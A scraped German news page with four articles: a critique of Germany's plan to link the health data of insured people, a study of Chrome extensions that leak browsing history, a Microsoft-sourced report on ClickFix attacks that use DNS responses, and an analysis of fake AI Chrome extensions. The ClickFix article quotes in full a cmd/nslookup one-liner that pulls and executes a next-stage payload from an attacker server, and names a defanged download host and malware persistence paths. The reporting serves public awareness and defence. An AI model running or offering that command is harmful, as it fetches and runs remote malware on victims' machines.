Connect with us

Datenschutz & Sicherheit

So umfassend will Warken die Gesundheitsdaten aller Versicherten verknüpfen


Rund 75 Millionen gesetzlich Versicherte, ihre Gesundheitsdaten täglich übermittelt an ein nationales Forschungsdatenzentrum, verknüpfbar mit hunderten Medizinregistern und europaweit vernetzt – das ist die Vision von Bundesgesundheitsministerin Nina Warken (CDU).

Die Ministerin präsentierte in der vergangenen Woche ihre „Digitalisierungsstrategie für das Gesundheitswesen und die Pflege“. Darin verspricht Warken eine bessere medizinische Versorgung und mehr Patientensouveränität. Tatsächlich aber zielt ihre Strategie vor allem darauf ab, eine der umfassendsten Gesundheitsdateninfrastrukturen weltweit aufzubauen.

Das knapp 30-seitige Papier legt zugleich die Grundlage für ein umfangreiches „Digitalgesetz“. Den Entwurf will das Bundesgesundheitsministerium (BMG) noch im laufenden Quartal vorlegen. Die Rechte der Patient:innen drohen darin weitgehend auf der Strecke zu bleiben.

Die geplante Dateninfrastruktur ruht auf drei Säulen: die elektronische Patientenakte, das Forschungsdatenzentrum Gesundheit und das geplante Medizinregistergesetz. Das Zusammenspiel aller drei Vorhaben ebnet auch der EU-weiten Vernetzung der Gesundheitsdaten den Weg.

Die ePA soll zur „Gesundheits(daten)plattform“ werden

Alle Versicherten, die nicht widersprochen haben, besitzen seit Januar 2025 eine elektronische Patientenakte (ePA); seit Oktober 2025 sind Behandelnde dazu verpflichtet, sie zu verwenden. Gesundheitsministerin Warken will die ePA nicht nur zum „zentralen Dreh- und Angelpunkt“ der ärztlichen Versorgung machen, sondern auch zur „Gesundheits(daten)plattform“ ausbauen.

Dafür sollen erstens mehr strukturierte Daten in die ePA fließen, die dann „möglichst in Echtzeit für entsprechende Anwendungsfälle nachnutzbar“ sind. Derzeit sind dort vor allem noch PDF-Dateien hinterlegt, die nicht einmal durchsuchbar sind, was den Umgang mit der ePA aus Sicht von Behandelnden deutlich erschwert.

Zweitens soll die ePA weitere Funktionen wie eine digitale Terminvermittlung und elektronische Überweisungen erhalten. Die Patientenakte soll so „auch interessanter werden für diejenigen, die nicht krank sind“, kündigte Warken an. Derzeit nutzen gerade einmal rund 4 Millionen Menschen ihre ePA aktiv. Bis zum Jahr 2030 soll sich ihre Zahl, so das Ziel des BMG, auf 20 Millionen erhöhen.

„Künstliche Intelligenz“ soll Symptome auswerten

Wer sich krank fühlt, soll künftig auch über die ePA-App eine digitale Ersteinschätzung einholen können. Mit Hilfe eines Fragenkatalogs sollen Versicherte dann erfahren, ob ihre Symptome den Gang zur Hausärztin oder gar zur Notfallambulanz rechtfertigen.

Diese Auswertung soll offenbar auch mit Hilfe sogenannter Künstliche Intelligenz erfolgen. Ohnehin soll KI laut Warken „in Zukunft da eingesetzt werden können, wo sie die Qualität der Behandlung erhöht, beim Dokumentationsaufwand entlastet oder bei der Kommunikation unterstützt“. Bis 2028 sollen beispielsweise mehr als 70 Prozent der Einrichtungen in der Gesundheits- und Pflegeversorgung KI-gestützte Dokumentation nutzen – ungeachtet der hohen Risiken etwa für die Patientensicherheit oder die Autonomie der Leistungserbringer.

Dafür will das BMG „unnötigen bürokratischen Aufwand“ für KI-Anbieter reduzieren. Das Ministerium strebt dafür mit Blick auf den Digitalen Omnibus der EU-Kommission „eine gezielte Anpassung der KI-Verordnung“ an. Das umstrittene Gesetzesvorhaben der Kommission zielt darauf ab, Regeln für risikoreiche KI-Systeme hinauszuzögern und den Datenschutz deutlich einzuschränken. Zivilgesellschaftliche Organisationen warnen eindringlich, dass mit dem Omnibus der „größte Rückschritt für digitale Grundrechte in der Geschichte der EU“ drohe.

Forschungsdatenzentrum soll als „Innovationsmotor“ wirken

Die in der ePA hinterlegten Daten sollen aber nicht nur der ärztlichen Versorgung dienen, sondern vor allem auch der Forschung zugutekommen. Sie sollen künftig – sofern Versicherte dem nicht aktiv widersprechen – täglich automatisch an das Forschungsdatenzentrum Gesundheit (FDZ) gehen. Während Warken die ePA als „Dreh- und Angelpunkt“ der Versorgung sieht, beschreibt sie das FDZ als „Innovationsmotor“ der Gesundheitsforschung.

Das FDZ wurde nach jahrelangen Verzögerungen im vergangenen Herbst erst handlungsfähig. Es ist beim Bundesamt für Arzneimittel und Medizinprodukte (BfArM) in Bonn angesiedelt. Forschende können sich bei dem Zentrum registrieren, um mit den dort hinterlegten Daten zu arbeiten. Auch Pharma-Unternehmen können sich bewerben. Eine Voraussetzung für eine Zusage ist, dass die Forschung einem nicht näher definierten „Gemeinwohl“ dient.

Die pseudonymisierten Gesundheitsdaten sollen das FDZ nicht verlassen. Stattdessen erhalten Forschende Zugriff auf einen Datenzuschnitt, der auf ihre Forschungsfrage abgestimmt ist. Die Analysen erfolgen in einer „sicheren Verarbeitungsumgebung“ auf einem virtuellen Desktop, das Forschende übers Internet aufrufen können.

Ob dabei tatsächlich angemessene Schutzstandards bestehen, muss indes bezweifelt werden. Denn das Forschungszentrum verfügte in den vergangenen Jahren nicht einmal über ein IT-Sicherheitskonzept, weshalb auch ein Gerichtsverfahren der Gesellschaft für Freiheitsrechte ruht.

Gemeinsam mit der netzpolitik.org-Redakteurin Constanze Kurz hatte die GFF gegen die zentrale Sammlung sensibler Gesundheitsdaten beim FDZ geklagt. Aus ihrer Sicht sind die gesetzlich vorgesehenen Schutzstandards unzureichend, um die sensiblen Gesundheitsdaten vor Missbrauch zu schützen. Sie verlangt daher für alle Versicherten ein voraussetzungsloses Widerspruchsrecht gegen die Sekundärnutzung der eigenen Gesundheitsdaten. Nachdem das FDZ seit Oktober den aktiven Betrieb aufgenommen hat, dürfte das ruhende Verfahren in Kürze fortgesetzt werden.

„Real-World-Überwachung“ ermöglichen

Dessen ungeachtet haben sich laut BfArM-Präsident Karl Broich bereits 80 Einrichtungen beim FDZ registriert. Die Antragsteller kommen zu gleichen Teilen aus Wirtschaft, Verwaltung und Forschung. Mehr als zwei Drittel von ihnen hätten bereits konkrete Forschungsanträge gestellt, bis zum Ende des Jahres will Warken diese Zahl über die Schwelle von 300 hieven. Alle positiv beschiedenen Anträge sollen künftig in einem öffentlichen Antragsregister einsehbar sein.

Zum Jahreswechsel wird das FDZ wohl auch über weit mehr Daten verfügen als derzeit. Bislang übermitteln die gesetzlichen Krankenkassen die Abrechnungsdaten all ihrer Versicherten an das Forschungszentrum. Diese geben bereits Auskunft darüber, welche Leistungen und Diagnosen die Versicherungen in Rechnung gestellt bekommen haben.

Ab dem vierten Quartal dieses Jahres sollen dann nach und nach die Behandlungsdaten aus der ePA hinzukommen. Den Anfang machen Daten aus der elektronischen Medikationsliste, anschließend folgen die Laborfunde, dann weitere Inhalte.

Der baldige Datenreichtum gibt dem FDZ aus Sicht von BfArM-Chef Broich gänzlich neue Möglichkeiten. Er geht davon aus, dass seine Behörde in zehn Jahren bundesweit „einer der großen Daten-Hubs“ ist. Mit den vorliegenden Daten könnten Forschende dann umfassende „Lifecycle-Beobachtungen“ durchführen – „eine Real-World-Überwachung also, die klassische klinische Prüfungen so nicht abdecken können“.

Auch im FDZ soll „Künstliche Intelligenz“ mitwirken. Zum einen in der Forschung selbst: „Dafür arbeiten wir an Konzepten, die Datenschutz, Sicherheit und wissenschaftliche Nutzbarkeit von Beginn an zusammendenken“, sagt Broich. Zum anderen soll das FDZ Datensätze etwa für das Training von Sprachmodellen bereitstellen, wie die Digitalisierungsstrategie des BMG ausführt und auch bereits gesetzlich festgeschrieben ist. Sowohl Training als auch Validierung und Testen von KI-Systemen sind eine zulässige Nutzungsmöglichkeiten. Das bedeutet konkret: Die sensiblen Gesundheitsdaten von Millionen Versicherten können zum Training von Sprachmodellen verwendet werden.

Warken will Medizinregister miteinander verknüpfen

Ab 2028 könnten Trainingsdaten dann auch detaillierte Daten zu Krebserkrankungen enthalten. Denn in knapp zwei Jahren sollen die FDZ-Datenbestände mit Krebsregistern sowie dem Projekt genomDE verknüpft werden, das Erbgutinformationen von Patient:innen sammelt.

Die Datenfülle beim FDZ dürfte damit noch einmal ordentlich zunehmen. Allein die Krebsregister der Länder Bayern, Nordrhein-Westfalen und Rheinland-Pfalz halten Daten von insgesamt mehr als drei Millionen Patient:innen vor. Wer nicht möchte, dass etwa die eigenen Krebsdaten mit den Genomdaten verknüpft werden, muss mindestens einem der Register komplett widersprechen.

Im Gegensatz etwa zu den Krebsregistern der Länder, die auf Basis spezieller rechtlicher Grundlagen arbeiten, bewegen sich die meisten anderen Medizinregister dem BMG zufolge derzeit „in einem heterogenen Normengeflecht von EU-, Bundes- und Landesrecht“, was „die Schaffung einer validen Datenbasis“ behindere.

Das Ministerium hat daher bereits im Oktober das „Gesetz zur Stärkung von Medizinregistern und zur Verbesserung der Medizinregisterdatennutzung“ auf den Weg gebracht. Der Referentenentwurf sieht vor, einheitliche rechtliche Vorgaben und Qualitätsstandards für Medizinregister zu schaffen.

Wir sind communityfinanziert

Unterstütze auch Du unsere Arbeit mit einer Spende.

Ein Zentrum für Medizinregister (ZMR), das ebenfalls am BfArM angesiedelt wäre, soll demnach bestehende Medizinregister nach festgelegten Vorgaben etwa hinsichtlich Datenschutz und Datenqualität bewerten. Qualifizierte Register werden dann in einem Verzeichnis aufgeführt, dürfen zu einem festgelegten Zweck kooperieren und auch anlassbezogen Daten zusammenführen. Die personenbezogenen Daten, die dort gespeichert sind, können für die Dauer von bis zu 100 Jahren in den Registern gespeichert werden.

Derzeit gibt es bundesweit rund 350 Medizinregister. Zu den größten zählen das „Deutsche Herzschrittmacher Register“, das die Daten von mehr als einer Million Patient:innen enthält, und das „TraumaRegister DGU“ mit Daten von mehr als 100.000 Patient:innen. Das Gesundheitsministerium geht davon aus, dass etwa drei Viertel der bestehenden Medizinregister Interesse daran haben könnten, in das Verzeichnis des ZMR aufgenommen zu werden.

Verbraucher- und Datenschützer:innen mahnen Schutzvorkehrungen an

Gesundheitsdaten, die dem ZMR vorliegen, sollen ebenfalls pseudonymisiert oder anonymisiert der Forschung bereitstehen. Das geplante Medizinregistergesetz sieht außerdem vor, dass die Daten qualifizierter Register ebenfalls miteinander verknüpft werden können.

Zu diesem Zweck sollen Betreiber von Medizinregistern und die meldenden Gesundheitseinrichtungen registerübergreifende Pseudonyme erstellen dürfen. Als Grundlage dafür soll der unveränderbare Teil der Krankenversichertennummer von Versicherten (KVNR) dienen.

Fachleute weisen darauf hin, dass eine Pseudonymisierung insbesondere bei Gesundheitsdaten keinen ausreichenden Schutz vor Re-Identifikation bietet. Das Risiko wächst zudem, wenn ein Datensatz mit weiteren Datensätzen zusammengeführt wird, wenn diese weitere personenbezogene Daten der gleichen Person enthält.

Das Netzwerk Datenschutzexpertise warnt zudem davor, die Krankenversichertennummer in einer Vielzahl von Registern vorzuhalten. Weil im Gesetzentwurf notwendige Schutzvorkehrungen fehlen würden, sei „das Risiko der Reidentifizierung bei derart pseudonymisierten Datensätzen massiv erhöht“.

Der Verbraucherzentrale Bundesverband kritisiert die Menge an personenbezogenen Daten, die laut Gesetzentwurf an qualifizierte Medizinregister übermittelt werden dürfen. Dazu zählen neben sozialdemographischen Informationen auch Angaben zu Lebensumständen und Gewohnheiten sowie „zu einem Migrationshintergrund oder einer ethnischen Zugehörigkeit, der Familienstand oder die Haushaltsgröße“.

Um die Patient:innendaten besser zu schützen, forderte der Verband bereits im November vergangenen Jahres, eindeutig identifizierende Daten vom Kerndatensatz eines Medizinregisters getrennt aufzubewahren.

Gesundheitsministerium schafft Schnittstellen in die EU

Das Gesundheitsministerium lässt sich davon jedoch nicht beirren und strebt weitere Datenverknüpfungen an. Laut seiner Digitalisierungsstrategie will das BMG das Forschungspseudonym auch dazu nutzen, um die Gesundheits- und Pflegedaten „mit Sozialdaten und Todesdaten zu Forschungszwecken“ sowie „mit Abrechnungs- und ePA-Daten“ zu verbinden. Ob Versicherte dieser umfangreichen Datenverknüpfung überhaupt noch effektiv und transparent widersprechen können, ist derzeit zweifelhaft. Sicher aber ist: Der Aufwand dürfte immens sein.

Die Digitalisierungsstrategie macht ebenfalls deutlich, dass das Ministerium die geplanten Maßnahmen auch in Vorbereitung auf den Europäischen Gesundheitsdatenraum (EHDS) ergreift. Der EHDS ist der erste sektorenspezifische Datenraum in der EU und soll als Blaupause für weitere sogenannte Datenräume dienen. Schon in wenigen Jahren sollen hier die Gesundheitsdaten von rund 450 Millionen EU-Bürger:innen zusammenlaufen und grenzüberschreitend ausgetauscht werden.

Konkret bedeutet das: In gut drei Jahren, ab Ende März 2029, können auch Forschende aus der EU beim FDZ Gesundheitsdaten beantragen. Und das Zentrum für Medizinregister soll dem BMG zufolge ebenfalls Teil der europäischen Gesundheitsdateninfrastruktur werden.

Der größte Brückenschlag in der Gesundheitsdateninfrastruktur steht also erst noch bevor. Und auch hier bleibt die Ministerin eine überzeugende Antwort schuldig, was die Versicherten davon haben.



Source link

Datenschutz & Sicherheit

Populäre Chrome-Erweiterungen spähen Nutzer aus


close notice

This article is also available in
English.

It was translated with technical assistance and editorially reviewed before publication.

Eine IT-Forschergemeinschaft mit dem Namen „Q Continuum“ hat automatisiert zigtausende der beliebtesten Chrome-Erweiterungen untersucht. Knapp 300 davon, teils mit je vielen Millionen Installationen, liefern den Browserverlauf von Nutzerinnen und Nutzern an ihre Hersteller aus. Den Usern ist meistens wohl nicht klar, dass sie ausspioniert werden.

Weiterlesen nach der Anzeige

Die Analyse und ihre Ergebnisse stellt „Q Continuum“ in einem Github-Projekt bereit. Beim Versuchsaufbau haben sie Chrome in einen Docker-Container verfrachtet und den Traffic durch einen Man-in-the-Middle-Proxy geschleust. Dabei beobachteten sie die ausgehenden Anfragen unter dem Aspekt, wie sie mit der Länge der URLs korrelieren, die dem Chrome-Browser vorgesetzt wurden. Dabei haben die IT-Forscher synthetische Browser-Daten eingesetzt, konkret konsistent geformte Anfragen an google.com, die jedoch nie den Docker-Container verlassen. Dann untersucht ein Skript die ausgehenden Daten darauf hin, wie umfangreich der abgehende Traffic ist.

Die Idee dahinter: Wenn eine Erweiterung lediglich den Seitentitel liest oder eigenes CSS in die Seite einbaut, sollte der Netzwerk-Fußabdruck niedrig bleiben, egal, wie lang die besuchte URL ist. Wenn der abgehende Traffic jedoch linear mit der URL-Länge ansteigt, liefert die Erweiterung mit hoher Wahrscheinlichkeit die URL oder die gesamte HTTP-Anfrage an einen Server ins Internet aus. Damit konnten sie Erweiterungen eingrenzen, die sehr wahrscheinlich sensible Daten ausspähen.

Insgesamt haben die Analysten die 32.000 populärsten Chrome-Erweiterungen von den 240.000 im Chrome-Webstore verfügbaren untersucht. Dabei haben sie 287 teils sehr populäre Kandidaten aufgespürt, die Daten exfiltrieren. Insgesamt 37,4 Millionen User haben diese Plug-ins in ihren Webbrowser installiert und werden davon ausgeforscht.

Diese Daten können zur Profilbildung und gezielter Werbung genutzt werden, aber auch zu Wirtschaftsspionage oder dem Abziehen von Zugangsdaten, erklärt das „Q Continuum“ die potenziellen Gefahren. Andererseits ist nicht jede Erweiterung automatisch auch mit bösartiger Absicht unterwegs. Auf Platz 1 findet sich etwa „Avast Online Security & Privacy“ mit sechs Millionen Installationen, ein Plug-in zur Reputationsprüfung von Webseiten. Offenbar nutzt es keine lokale Datenbank, sondern sendet die URLs zur Prüfung an die Herstellerserver. Allerdings hat gerade Avast da eine wenig rühmliche Vergangenheit: Wegen Datenweitergabe musste das Unternehmen 2024 16,5 Millionen US-Dollar Strafe in den USA zahlen, da die gesammelten Daten von mehr als 100 Millionen Nutzern über die Tochterfirma Jumpshot verkauft wurden. An zweiter Stelle folgen mit je 3 Millionen Nutzern die Erweiterungen „Ad Blocker: Stands AdBlocker“ sowie „Monica: ChatGPT AI Assistant | DeepSeek, GPT-4o, Claude 3.5, o1 &More“.

Die Webseite hält eine Liste der beim Ausspähen beobachteten Chrome-Erweiterungen vor. Detaillierte Einblicke gibt das rund 260-seitige PDF, wovon die letzten etwa 150 Seiten jedoch lediglich Details zu den betroffenen Erweiterungen wie IDs, Namen, Nutzerzahlen und Ähnliches umfassen. Wer nicht möchte, dass die eigenen Browser-Erweiterungen den eigenen Browser-Verlauf an die Anbieter senden, sollte die Erweiterungsliste prüfen und gegebenenfalls die Add-ons deinstallieren.

Weiterlesen nach der Anzeige

Browser-Erweiterungen sind oft nützliche Helferlein, sie können jedoch auch Datenschleudern sein, die die Privatsphäre verletzen. Einige Akteure nutzen das zur eigenen Bereicherung aus, indem sie die gewonnenen Daten monetarisieren. Das Phänomen selbst ist bereits älter. Etwa 2019 hat der IT-Sicherheitsforscher Sam Jadali 200 Chrome- und Firefox-Erweiterungen angeschaut und diese ebenfalls beim Datensammeln erwischt. Auf diese übertragenen Daten hatten zudem Dritte Zugriff. Bei dieser Späh-Masche mit dem Namen „DataSpii“ waren Surf-Daten von 4,1 Millionen Menschen betroffen.


(dmk)



Source link

Weiterlesen

Datenschutz & Sicherheit

ClickFix-Attacken nutzen Schadcode in DNS-Antworten


Bei ClickFix-Angriffen verleiten Cyberkriminelle ihre Opfer dazu, einen Befehl auf dem Rechner auszuführen, der angeblich ein Problem lösen soll. Tatsächlich installiert der jedoch Malware aus dem Internet. Eine neue Variante setzt dabei auf DNS-Antworten zur Verteilung der Schadsoftware.

Weiterlesen nach der Anzeige

Das hat Microsofts Threat-Intelligence-Team auf Linkedin bekannt gegeben. Um der Erkennung zu entgehen, setzen die Angreifer nun darauf, einen vermeintlich harmlosen „nslookup“-Befehl abzusetzen. Microsoft zeigt den Beispielaufruf von cmd /c ”nslookup example.com 84.xx.yy.zz | findstr ”^Name:” | for /f ”tokens=1,* delims=:” %a in (’more’) do @echo %b” cmd && exit\1 – dieser Befehl wird offenbar auch verschleiert mit eingeworfenen Sonderzeichen („^“) überliefert.

Dieser Befehl fragt beim Zielserver mit der hier verschleierten IP-Adresse nach einer Auflösung für den Domain-Namen „example.com“. Die „Name:“-Antwort verarbeitet der Befehl dann, um den Schadcode der nächsten Infektionsstufe zu empfangen und auszuführen, erklären die IT-Forscher aus dem Microsoft-Defender-Team. Dieser Angriff umgeht klassischen Malware-Schutz, zudem sieht die serverseitige DNS-Antwort für Virenschutz in der Regel unverdächtig aus – anders als üblicherweise genauer untersuchter Netzwerkverkehr etwa von Webservern.

Der Schadcode aus der DNS-Antwort lädt dann eine .zip-Datei von „hxxp://azwsappdev[.]com/“ herunter, aus dem ein Portable-Python-Bundle sowie bösartiger Python-Code extrahiert werden. Der ausgeführte Python-Code untersucht die vorgefundene Windows-Umgebung und lädt schließlich die finale Infektionsstufe nach, die als „%APPDATA%\WPy64-31401\python\script.vbs“ im Dateisystem landet und mittels „%STARTUP%/MonitoringService.lnk“ im Autostart eingerichtet wird. Es handelt sich dabei um einen Fernzugriff-Trojaner namens „ModeloRAT“.

Bei ClickFix handelt es sich um Social-Engineering-Angriffe, die in der Regel über Phishing, Malvertising oder Drive-by-Köder (etwa gefälschte Captcha- oder „Beheben Sie dieses Problem”-Dialoge) eingesetzt wird, um Benutzer dazu zu verleiten, einen Befehl zu kopieren, einzufügen und auszuführen, fasst Microsoft diese Attacken-Variante zusammen. Gegen Drahtzieher solcher Angriffe gehen auch internationale Strafverfolger immer wieder vor. So konnten im Rahmen der „Operation Endgame 2.0“ etwa hunderte Server außer Gefecht gesetzt werden, die unter anderem ebenfalls für ClickFix-Attacken genutzt wurden.


(dmk)



Source link

Weiterlesen

Datenschutz & Sicherheit

Falsche KI-Erweiterungen für Chrome gefährden 260.000 Nutzer


close notice

This article is also available in
English.

It was translated with technical assistance and editorially reviewed before publication.

Zig Chrome-Erweiterungen, die von mehr als 260.000 Nutzern und Nutzerinnen installiert wurden, sind Teil einer Kampagne, die es auf Daten und Informationen der Opfer abgesehen hat. Die kriminellen Hinterleute umgehen dazu auch Sicherheitsvorkehrungen des Chrome-Stores.

Weiterlesen nach der Anzeige

IT-Sicherheitsforscher von LayerX haben die „AiFrame“ genannte Erweiterungskampagne analysiert und die Ergebnisse in einem aktuellen Blog-Beitrag veröffentlicht. Die Täter bieten vermeintliche KI-Assistenten zum Zusammenfassen, Chatten, Schreiben oder als Gmail-Assistent in Form von Erweiterungen für den Webbrowser Chrome an. Die Erweiterungen wirken oberflächlich legitim, fußen aber auf einer gefährlichen Architektur. Viele Funktionen der Erweiterungen haben die Drahtzieher nicht lokal implementiert, sondern betten dazu serverseitige Schnittstellen aus dem Internet ein und funktionieren so als privilegierte Proxys, die der Infrastruktur aus dem Netz Zugriff auf sensible Browser-Fähigkeiten gewähren.

Die Analysten haben über 30 unterschiedliche Chrome-Erweiterungen, die mit unterschiedlichen IDs und Namen veröffentlicht wurden, aber derselben darunterliegenden Codebasis, Berechtigungen und Backend-Infrastruktur entdeckt. Sie wurden zusammen mehr als 260.000 Mal installiert – einige davon waren zeitweise im Chrome Web Store als empfohlen (Featured) markiert, was ihre vermeintliche Legitimität erhöhte. Als Köder dienen bekannte Namen wie Claude, ChatGPT, Gemini sowie Grok, aber auch als allgemeines „AI Gmail“-Tool werden die bösartigen Erweiterungen beworben und verteilt.

Die Analyse schaut detaillierter auf die Erweiterungen. Trotz unterschiedlicher Namen und IDs teilen sie sich dieselbe interne Struktur, dieselbe JavaScript-Logik, Berechtigungen sowie Backend-Infrastruktur. Es handelt sich daher um eine koordinierte Operation anstatt um eigenständige Werkzeuge. Es handelt sich den IT-Forschern zufolge um sogenanntes „Extension Spraying“, bei dem die Angreifer Auswirkungen von entfernten Erweiterungen und reputationsbasierten Abwehrmechanismen umgehen, indem sie einfach unter neuem Namen weitere Erweiterungen in den Store einstellen.

Kritisch ist, dass ein signifikanter Anteil der Funktionen der Erweiterungen durch im Netz gehostete Komponenten geliefert wird. Dadurch bestimmt sich ihr Laufzeitverhalten durch serverseitige Änderungen und nicht durch zur Installationszeit im Chrome-Web-Store untersuchten Code. Das ermöglicht somit die Umgehung von einem Teil von Googles Sicherheitsmechanismen. Die Kernkomponente wird dabei als Iframe vom Server eingebunden, der in Vollbildgröße dargestellt wird. Er überlagert die aktuelle Webseite und stellt visuell das Nutzerinterface der Erweiterung dar.

Weiterlesen nach der Anzeige

Auf Geheiß des serverseitigen Iframes analysiert die Erweiterung den aktiven Browser-Tab und extrahiert dessen Inhalt, den sie an den Server schickt. Das können auch sensible Informationen von Seiten sein, in denen Opfer gerade angemeldet sind. Das Iframe kann die Erweiterung auch anweisen, die Stimmenerkennung der Web-Speech-API zu starten, woraufhin diese dann ein Transkript an die entfernte Seite schickt – ein leicht auswertbarer Mitschnitt der Kommunikation ist möglich; jedoch begrenzen Browser-Berechtigungen in einigen Fällen den möglichen Missbrauch, erklären die IT-Forscher.

Der Command-and-Control-Server liegt auf der Haupt-Domain tapnetic[.]pro, wobei die einzelnen Erweiterungen unterschiedliche Subdomains davon aufrufen. Die Seite scheint auf den ersten Blick legitim, allerdings gibt es dort keine Funktionen, Downloads oder mögliche Nutzerinteraktionen. Es gibt dort auch kein klar benanntes Produkt oder auch keine Dienstleistung, somit handelt es sich offenbar um eine Tarnseite. Die Kampagne läuft bereits seit Längerem. Schon vor rund einem Jahr haben die Analysten eine Erweiterung aus dieser Kampagne untersucht, sie wurde aus dem Chrome-Web-Store am 6. Februar 2025 entfernt. Zwei Wochen später wurde sie unter neuer Erweiterungs-ID neu eingestellt und veröffentlicht.

Am Ende der Analyse liefern die IT-Forscher eine Auflistung von Indizien für Infektionen (Indicators of Compromise, IOCs). Dort benennen sie etwa IDs, Namen und Anzahl an aktiven Installationen der bislang entdeckten, schädlichen „AiFrame“-Erweiterungen.

Browser-Erweiterungen stellen ein beliebtes Einfallstor für Cyberkriminelle dar. Immer wieder fallen sie für diverse Webbrowser negativ auf. Anfang vergangenen Jahres konnten sich etwa Täter Zugriff auf Konten von Entwicklern diverser Chrome-Extensions verschaffen und den Code durch schädliche Fassungen der Erweiterungen ersetzen.


(dmk)



Source link

Weiterlesen

Beliebt